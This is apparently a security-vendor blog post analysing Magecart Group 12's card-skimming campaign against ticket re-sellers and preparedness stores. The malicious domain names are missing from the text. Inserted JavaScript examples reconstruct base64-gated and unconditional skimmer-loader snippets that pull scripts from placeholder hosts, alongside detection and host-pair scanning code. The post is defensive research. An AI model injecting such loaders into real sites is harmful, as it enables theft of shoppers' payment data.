
Magecart Group 12’s Latest: Actors Behind Cyberattacks on Olympics Ticket Re-sellers Deftly Swapped Domains to Continue Campaign

A recent blog post by Jacob Pimental and Max Kersten highlighted Magecart activity targeting ticket re-selling websites for the 2020 Olympics and UEFA Euro 2020, and respectively. These sites were compromised by a skimmer using the domain for data exfiltration. Using RiskIQ data, our researchers built on that reporting to identify more skimming domains used by the attackers, as well as additional compromised sites. RiskIQ can now also attribute all of these cyberattacks to Magecart Group 12.

The obfuscation and skimming code we observed on matches that used by Magecart Group 12, whose skimmer and obfuscation techniques we analyzed in our blog posts, "New Year, Same Magecart: The Continuation of Web-based Supply Chain Attacks" and "Magento Attack: All Payment Platforms are Targets for Magecart Attacks." However, there are differences in the techniques employed by Group 12 in these more recent compromises, which we'll break down here.

In those blog posts, we noted that Group 12 employed base64-encoded checks against the page URL, looking for the word "checkout," to identify the proper page on which to load their skimmer code. This encoding masked both the check itself and the skimmer URL. Quoting from our May 1st, 2019 report:

"Most of Group 12's injections occur with a pre-filter on the page—a small snippet of JavaScript that checks to see if they want to inject their skimmer on the page. Here's what it looks like:"

Magecart Group 12's script tag from RiskIQ's May report

However, in these more recent cyberattacks, the skimming JavaScript is loaded without obfuscation or URL checks. Instead, the script is loaded via a variable the attackers named 'eventsListenerPool,' which is an alias for a script element created with document.createElement('script'):

The Magecart skimmer

The variable loading the skimmer
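To make the difference between the two loader styles concrete, here is an added example (not code from the RiskIQ post, and not the skimmer's own code). It contains two constructed snippets written in the styles described above: the older Group 12 pre-filter with a base64-encoded "checkout" check and a base64-encoded skimmer URL, and the newer unconditional loader that parks the created script element in an innocuous-looking variable. Both are run in a minimal fake DOM so the trigger difference is visible, and a small static scanner pulls out the indicators a crawler would look for. All hostnames (skimmer-legacy.example, skimmer-new.example, shop.example) and paths are hypothetical placeholders.

```javascript
// Added example, not code from the RiskIQ post or from the skimmer itself.
// Runs under Node.js; the skimmer and shop hostnames are hypothetical.

const b64 = (s) => Buffer.from(s, "utf8").toString("base64");

// Hypothetical skimmer URLs used by the two constructed snippets.
const LEGACY_SKIMMER_URL = "https://skimmer-legacy.example/js/loader.js";
const NEW_SKIMMER_URL = "https://skimmer-new.example/js/events.js";

// Constructed: the older Group 12 pre-filter style.  Both the URL check
// ("checkout") and the skimmer URL are hidden behind base64 literals.
const LEGACY_PREFILTER = `
  if (new RegExp(atob("${b64("checkout")}")).test(location.href)) {
    var s = document.createElement("script");
    s.src = atob("${b64(LEGACY_SKIMMER_URL)}");
    document.head.appendChild(s);
  }`;

// Constructed: the newer style, an innocuous-looking alias for a created
// script element, loaded on every page with no URL gate and no encoding.
const NEW_LOADER = `
  var eventsListenerPool = document.createElement("script");
  eventsListenerPool.src = "${NEW_SKIMMER_URL}";
  document.head.appendChild(eventsListenerPool);`;

// Run a snippet against a fake document/location and return the script
// URLs it tried to load.  Only the DOM members the snippets touch are
// emulated; this is a demonstration harness, not a sandbox for hostile code.
function runInFakeDom(snippet, pageUrl) {
  const loaded = [];
  const document = {
    createElement: (tag) => ({ tagName: tag.toUpperCase(), src: "" }),
    head: { appendChild: (el) => { if (el.tagName === "SCRIPT") loaded.push(el.src); } },
  };
  const location = { href: pageUrl };
  const atob = (s) => Buffer.from(s, "base64").toString("binary");
  new Function("document", "location", "atob", snippet)(document, location, atob);
  return loaded;
}

// Static indicators: decoded base64 literals, variables aliasing a created
// script element, external hosts referenced (directly or after decoding),
// and whether the snippet gates itself on a "checkout" URL.
function scanForLoaderIndicators(snippet) {
  const decodedBase64 = [...snippet.matchAll(/atob\(\s*["']([A-Za-z0-9+/=]+)["']\s*\)/g)]
    .map((m) => Buffer.from(m[1], "base64").toString("utf8"));
  const scriptAliases = [...snippet.matchAll(/(\w+)\s*=\s*document\.createElement\(\s*["']script["']\s*\)/g)]
    .map((m) => m[1]);
  const externalHosts = new Set();
  for (const text of [snippet, ...decodedBase64]) {
    for (const m of text.matchAll(/https?:\/\/([a-z0-9.-]+)/gi)) externalHosts.add(m[1].toLowerCase());
  }
  const urlGated = [snippet, ...decodedBase64].some((t) => /checkout/i.test(t));
  return { decodedBase64, scriptAliases, externalHosts: [...externalHosts], urlGated };
}

if (typeof require !== "undefined" && require.main === module) {
  for (const url of ["https://shop.example/category/tents", "https://shop.example/checkout/onepage"]) {
    console.log(url, "legacy ->", runInFakeDom(LEGACY_PREFILTER, url), "new ->", runInFakeDom(NEW_LOADER, url));
  }
  console.log(scanForLoaderIndicators(LEGACY_PREFILTER));
  console.log(scanForLoaderIndicators(NEW_LOADER));
}
```

Run against a category page, the legacy pre-filter loads nothing and the new loader fires anyway; the scanner shows why a crawler that only watches checkout pages would have missed the newer variant, and why the decoded base64 literals (rather than the raw script text) are where the legacy variant's skimmer host surfaces.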

Next Domain Up

On February 3rd, Pimental and Kersten published their follow-up blog detailing their efforts to identify further victims and to have the skimming domain taken down by the Chinese company through which it was registered. On February 2nd, RiskIQ observed that was replaced on at least two of the victim sites named in the blog by a live skimmer domain,

The new skimmer domain

New skimmer domain

RiskIQ has observed the domain on three victim sites so far, all of which were previously compromised by, as seen through our host pairs data set in RiskIQ Community:

Victims of original skimmer domain

Victims of new skimmer domain

The domain was registered on February 1st, 2020, through the Chinese registrar Guangzhou Shidaihulian and uses the same DNS provider as, DNSPod (also based in China). Both domains are hosted on NGINX servers and use Let's Encrypt certificates. The IPs connected to have changed at least once a day, and sometimes more often, with every server so far based in Russia.

Resolutions for

Hosting for followed a more leisurely pace of flux. From January 2019 through January 2020, it sometimes used the same IP for weeks at a time and used servers based all over the world.

Resolutions for

Targets Beyond Sporting Event Ticket Re-selling

RiskIQ's detection logic allowed us to identify additional domains hosting this particular Magecart skimmer. Two popular emergency preparedness sites, and, were affected by one of these additional skimmer domains.

One of the new victims with an Alexa ranking of 105,288

Both sites are owned by Blue Chip Group Manufacturing and appear to be similarly constructed. We observed loading skimming code from on January 27th. The site seems to have been loading the skimming code from January 16th through 29th. In these instances, the skimmer was added through a simple script tag.

Host pairs showing sites loading

Magecart script on

Magecart script on
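The host-pairs view used throughout this post (which site loaded which external script, and over what dates) can be rebuilt from crawled HTML. The following is an added example, not RiskIQ code or RiskIQ data: it extracts off-site script tags of the "simple script tag" kind seen on the two sites above, aggregates them into site/child records with first-seen and last-seen dates, flags sites whose child host is a known skimmer domain, and checks whether each site's latest crawl is clean. Every site, date and domain in it is constructed; the skimmer domains are hypothetical placeholders, not the real Group 12 infrastructure.

```javascript
// Added example, not RiskIQ code or data.  Runs under Node.js.
// Hypothetical skimmer domains standing in for real IOCs.
const SKIMMER_IOCS = new Set(["skimmer-a.example", "skimmer-b.example"]);

// Constructed crawl records.  Dates are ISO strings so they sort lexically.
const CRAWLS = [
  { site: "prep-store-one.example", date: "2020-01-16",
    html: '<script src="/js/app.js"></script><script src="https://skimmer-a.example/js/checkout.js"></script>' },
  { site: "prep-store-one.example", date: "2020-01-29",
    html: '<script src="/js/app.js"></script><script src="https://skimmer-a.example/js/checkout.js"></script>' },
  { site: "prep-store-one.example", date: "2020-02-05",
    html: '<script src="/js/app.js"></script>' },
  { site: "prep-store-two.example", date: "2020-01-24",
    html: '<script src="https://cdn.example/jquery.js"></script><script src="https://skimmer-b.example/js/ga.js"></script>' },
  { site: "prep-store-two.example", date: "2020-01-27",
    html: '<script src="https://skimmer-a.example/js/checkout.js"></script>' },
];

// Hosts of <script src=...> tags that point off-site.  Relative and same-host
// sources are dropped; a real crawler would also record inline loaders.
function externalScriptHosts(html, site) {
  const hosts = new Set();
  for (const m of html.matchAll(/<script\b[^>]*\bsrc\s*=\s*["']([^"']+)["']/gi)) {
    const host = new URL(m[1], `https://${site}/`).hostname.toLowerCase();
    if (host !== site) hosts.add(host);
  }
  return [...hosts];
}

// site -> child host -> {first, last, count}: the shape of a host-pair record.
function buildHostPairs(crawls) {
  const pairs = new Map();
  for (const { site, date, html } of crawls) {
    if (!pairs.has(site)) pairs.set(site, new Map());
    for (const child of externalScriptHosts(html, site)) {
      const rec = pairs.get(site).get(child) || { first: date, last: date, count: 0 };
      rec.first = rec.first < date ? rec.first : date;
      rec.last = rec.last > date ? rec.last : date;
      rec.count += 1;
      pairs.get(site).set(child, rec);
    }
  }
  return pairs;
}

// Victim list: every (site, skimmer) pair whose child host is a known IOC,
// with the observed date range, sorted for stable output.
function flagVictims(pairs, iocs) {
  const hits = [];
  for (const [site, children] of pairs) {
    for (const [child, rec] of children) {
      if (iocs.has(child)) hits.push({ site, skimmer: child, ...rec });
    }
  }
  return hits.sort((a, b) => a.site.localeCompare(b.site) || a.skimmer.localeCompare(b.skimmer));
}

// True when the most recent crawl of `site` references no IOC host,
// false when it still does, null when the site was never crawled.
function currentlyClean(crawls, site, iocs) {
  const latest = crawls.filter((c) => c.site === site).sort((a, b) => b.date.localeCompare(a.date))[0];
  if (!latest) return null;
  return !externalScriptHosts(latest.html, site).some((h) => iocs.has(h));
}

if (typeof require !== "undefined" && require.main === module) {
  console.table(flagVictims(buildHostPairs(CRAWLS), SKIMMER_IOCS));
  for (const site of ["prep-store-one.example", "prep-store-two.example"]) {
    console.log(site, "currently clean:", currentlyClean(CRAWLS, site, SKIMMER_IOCS));
  }
}
```

The date range comes straight out of the host-pair record, which is how a statement like "loading the skimming code from the 16th through the 29th" is derived; the clean check only looks at the most recent crawl, so a site that dropped one skimmer domain and picked up another (as happened when the replacement domain went live) still shows as infected.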

It appears the injections have been removed from sites, and they are currently free of skimming code. Additional IOCs can be viewed in our Magecart Group 12 project here:

Safety in the Age of Magecart

The activity seen here demonstrates that Magecart is a persistent and resilient threat. Given the lucrative nature of card skimming, Magecart attacks will continue to evolve and surprise security researchers with new capabilities. The actors are learning from past cyberattacks to stay one step ahead, so it's on us to do the same. Make sure you're staying up to date by reading all our findings on Magecart, and stay tuned as we continue to shine a light on new developments. Also, find out how RiskIQ protects customers by reading up on our JavaScript Threats Module here.


Update: Following the publication of this article, we observed further detections showing that was also loading skimming code from, another Group 12 domain. Our data shows that this began on January 24th. We have communicated this to the affected company and are working with them to remediate.
